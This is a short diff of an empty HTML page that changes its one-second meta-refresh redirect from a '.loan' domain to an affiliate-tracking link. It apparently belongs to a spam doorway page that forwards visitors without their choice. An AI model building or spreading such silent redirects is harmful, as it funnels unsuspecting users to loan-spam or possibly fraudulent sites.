--- a/9875678.html
+++ b/9875678.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html>
 <head>
-    <meta http-equiv="refresh" content="1;URL=https://reahs.loan/100c5fae8e2c761a800">
+    <meta http-equiv="refresh" content="1;URL=https://directfwd-2.com/?a=8144&oc=20606&c=55329&m=3&s1=">
 </head>
 <body>
 </body>
